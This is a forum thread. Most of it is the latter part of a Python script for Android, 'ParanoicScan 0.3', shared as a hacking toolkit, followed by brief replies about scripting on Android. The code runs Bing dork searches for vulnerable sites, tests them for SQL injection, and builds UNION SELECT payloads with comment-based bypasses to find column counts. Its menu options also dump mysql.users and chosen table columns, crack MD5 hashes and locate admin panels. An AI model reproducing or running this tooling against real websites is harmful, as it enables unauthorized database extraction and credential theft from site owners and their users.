   if not ref['which'] == 'positive' :
    menusql()
   else:
    tabla = ref['value']
    aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching Columns of DB ...")
    aplicacion.dialogShow()

    don = showcolumnsdb(webvul,db,tabla)
   
    aplicacion.dialogDismiss()

    aplicacion.dialogCreateAlert("SQLI Scanner",don)
    aplicacion.dialogSetPositiveButtonText("Done")
    aplicacion.dialogShow()
 
    op = aplicacion.dialogGetResponse().result

    if op["which"] == "positive" :
     menusql()

 if opsql==5 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
  aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Searching mysql.users ...")
  aplicacion.dialogShow()

  don = mysqluser(webvul)

  aplicacion.dialogDismiss()
 
  aplicacion.dialogCreateAlert("SQLI Scanner",don)
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
 
  op = aplicacion.dialogGetResponse().result

  if op["which"] == "positive" :
   menusql()
 
 if opsql==6 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
  aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Information ...")
  aplicacion.dialogShow()

  don = more(webvul)

  aplicacion.dialogDismiss()
 
  aplicacion.dialogCreateAlert("SQLI Scanner",don)
  aplicacion.dialogSetPositiveButtonText("Done")
  aplicacion.dialogShow()
 
  op = aplicacion.dialogGetResponse().result

  if op["which"] == "positive" :
   menusql()

 if opsql==7 :

  aplicacion.dialogCreateAlert("SQLI Scanner")
 
  aplicacion.dialogGetInput("SQLI Scanner","Enter Table")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menusql()
  else:   
   tabla = ref['value']

   aplicacion.dialogGetInput("SQLI Scanner","Enter Column1")
   ref = aplicacion.dialogGetResponse().result

   if not ref['which'] == 'positive' :
    menusql()
   else:
    columna1 = ref['value']
    aplicacion.dialogGetInput("SQLI Scanner","Enter Column2")
    ref = aplicacion.dialogGetResponse().result
    if not ref['which'] == 'positive' :
     menusql()
    else:   
     columna2 = ref['value']
     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Getting Values ...")
     aplicacion.dialogShow()

     don = dumper(webvul,tabla,columna1,columna2)
   
     aplicacion.dialogDismiss()
     aplicacion.dialogCreateAlert("SQLI Scanner",don)
     aplicacion.dialogSetPositiveButtonText("Done")
     aplicacion.dialogShow() 
     op = aplicacion.dialogGetResponse().result

     if op["which"] == "positive" :
      menusql()

 if opsql==8:
  menu()

def menu():

 aplicacion.dialogCreateAlert("ParanoicScan 0.3 (C) Doddy Hackman 2014")
 aplicacion.dialogSetItems(["BingHackTool","SQLI Scanner","MD5 Cracker","Admin Finder","Locate IP","HTTP FingerPrinting","Encoders","About","Exit"])
 aplicacion.dialogShow()
 re = aplicacion.dialogGetResponse().result
 re2 = re["item"]
 
 if re2==0:

  aplicacion.dialogCreateAlert("BingHack Tool")
 
  aplicacion.dialogGetInput("BingHack Tool","Enter Dork")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:   
   dork = ref['value']

   aplicacion.dialogGetInput("BingHack Tool","Enter number of pages to search")
   ref = aplicacion.dialogGetResponse().result

   if not ref['which'] == 'positive' :
    menu()
   else:
    paginas = ref['value']

    paginas = str(paginas)

    aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Searching ...")
    aplicacion.dialogShow()

    founds = ""
    rez = ""
    rtafinal = ""
 
    founds = bingscan(dork,paginas)

    aplicacion.dialogDismiss()

    aplicacion.dialogCreateSpinnerProgress("BingHack Tool","Scanning ...")
    aplicacion.dialogShow()
 
    rez = sqltest(founds)

    if len(rez) == 0 :
     rtafinal = "[-] Not Found"
    else :
     rtafinal = "[++] Pages Founds\n\n"
     rtafinal = rtafinal + rez
     rtafinal = rtafinal + "\n[++] Finished\n"

    aplicacion.dialogDismiss()

    aplicacion.dialogCreateAlert("BingHack Tool",rtafinal)
    aplicacion.dialogSetPositiveButtonText("Done")
    aplicacion.dialogShow()
 
    op = aplicacion.dialogGetResponse().result
    if op["which"] == "positive" :
     menu()
 
 if re2==1 :
     
  global webvul

  aplicacion.dialogCreateAlert("SQLI Scanner")
 
  aplicacion.dialogGetInput("SQLI Scanner","Enter Page")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:   
   web = ref['value']
   aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Scanning ...")
   aplicacion.dialogShow()

   pass1,pass2 = bypass("--")
   code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
   codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)

   if not code==codedos:
    aplicacion.dialogDismiss()
    aplicacion.dialogCreateAlert("SQLI Scanner","[+] SQLI Detected")
    aplicacion.dialogSetPositiveButtonText("Done")
    aplicacion.dialogShow()
    op = aplicacion.dialogGetResponse().result
    if op["which"] == "positive" :

     pass1,pass2 = bypass("--")
     rtacondata = ""
     control_sql = 0

     aplicacion.dialogCreateSpinnerProgress("SQLI Scanner","[+] Finding columns length")
     aplicacion.dialogShow()

     number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
     for te in range(2,30):
      number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
      code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
      if(regexver(code)):
       numbers = regexdar(code)
   
       control_sql = 1

       rtacondata = rtacondata + "[+] Column length : "+str(te)
       rtacondata = rtacondata + "\n[+] Numbers "+str(numbers)+" print data"

       sql = ""
       tex = te + 1
       for sqlix in range(2,tex):
        sql = str(sql)+","+str(sqlix)
        sqli  = str(1)+sql
       sqla = reem(sqli,numbers[0])
       aplicacion.dialogDismiss()
       aplicacion.dialogCreateAlert("SQLI Scanner",rtacondata)
       aplicacion.dialogSetPositiveButtonText("Done")
       aplicacion.dialogShow()
       op = aplicacion.dialogGetResponse().result
       if op["which"] == "positive" :
        webvul = web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla
        menusql()
 
     if control_sql==0:

      aplicacion.dialogDismiss()
      aplicacion.dialogCreateAlert("SQLI Scanner","[-] Length dont found")
      aplicacion.dialogSetPositiveButtonText("Done")
      aplicacion.dialogShow()
      op = aplicacion.dialogGetResponse().result
      if op["which"] == "positive" :
       aplicacion.exit()

   else:
    aplicacion.dialogDismiss()
    aplicacion.dialogCreateAlert("SQLI Scanner","[-] Not Vulnerable")
    aplicacion.dialogSetPositiveButtonText("Done")
    aplicacion.dialogShow()
    op = aplicacion.dialogGetResponse().result
    if op["which"] == "positive" :
     aplicacion.exit()
 
 if re2==2 :

  aplicacion.dialogCreateAlert("MD5 Cracker")
 
  aplicacion.dialogGetInput("MD5 Cracker","Enter MD5")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:   
   target = ref['value']

   aplicacion.dialogCreateSpinnerProgress("MD5 Cracker","[+] Cracking ...")
   aplicacion.dialogShow()

   don = crackmd5(target)

   aplicacion.dialogDismiss()

   aplicacion.dialogCreateAlert("MD5 Cracker",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menu()
 
 if re2==3 :

  aplicacion.dialogCreateAlert("Admin Finder")
 
  aplicacion.dialogGetInput("Admin Finder","Enter Target")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:   
   target = ref['value']

   aplicacion.dialogCreateSpinnerProgress("Admin Finder","[+] Searching ...")
   aplicacion.dialogShow()

   don = scanpanel(target)

   aplicacion.dialogDismiss()

   aplicacion.dialogCreateAlert("Admin Finder",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menu()

 if re2==4 :

  aplicacion.dialogCreateAlert("LocateIP")
 
  aplicacion.dialogGetInput("LocateIP","Enter Target")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:
   target = ref['value']

   aplicacion.dialogCreateSpinnerProgress("LocateIP","[+] Searching ...")
   aplicacion.dialogShow()

   don = locateip(target)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("LocateIP",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menu()
 
 if re2==5 :

  aplicacion.dialogCreateAlert("HTTP FingerPrinting")
 
  aplicacion.dialogGetInput("HTTP FingerPrinting","Enter Target")
  ref = aplicacion.dialogGetResponse().result

  if not ref['which'] == 'positive' :
   menu()
  else:
   target = ref['value']

   aplicacion.dialogCreateSpinnerProgress("HTTP FingerPrinting","[+] Scanning ...")
   aplicacion.dialogShow()

   don = httpfinger(target)

   aplicacion.dialogDismiss()
 
   aplicacion.dialogCreateAlert("HTTP FingerPrinting",don)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menu()

 if re2==6 :
  menuencoder()

 if re2==7 :

   about = "This program was written by Doddy Hackman in the summer of 2014"
   aplicacion.dialogCreateAlert("About",about)
   aplicacion.dialogSetPositiveButtonText("Done")
   aplicacion.dialogShow()
 
   op = aplicacion.dialogGetResponse().result

   if op["which"] == "positive" :
    menu()
 
 if re2==8 :
  aplicacion.exit()
 
menu()

# The End ?

The code is here

Offline nafuti

  • Serf
  • *
  • Posts: 43
  • Cookies: 11
    • View Profile
Re: [Python-Android] ParanoicScan 0.3
« Reply #1 on: February 03, 2014, 04:57:54 pm »
I see you ported it to android. Personally i have never programmed python for android but am sure it won't be too different from the usual syntax.

Thanks for the share.

P.S. Just for the large python fan base, you could go ahead and write a tutorial about programming python for android.

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [Python-Android] ParanoicScan 0.3
« Reply #2 on: February 03, 2014, 06:09:54 pm »
derp python fo' roids
Actually Python isn't the only language that can be run on Android. There is this thing called SL4A (Scripting Layer for Android), which lets you run scripts on android in few languages, I think Perl and Ruby.
Coding with that framework is not hard at all and you can do it on the phone as well...

Offline nafuti

  • Serf
  • *
  • Posts: 43
  • Cookies: 11
    • View Profile
Re: [Python-Android] ParanoicScan 0.3
« Reply #3 on: February 03, 2014, 07:01:54 pm »
Actually Python isn't the only language that can be run on Android. There is this thing called SL4A (Scripting Layer for Android), which lets you run scripts on android in few languages, I think Perl and Ruby.
Coding with that framework is not hard at all and you can do it on the phone as well...
Amazing. You mean i can bring all the power of code to my android. I think i am gonna land that on my TODO list.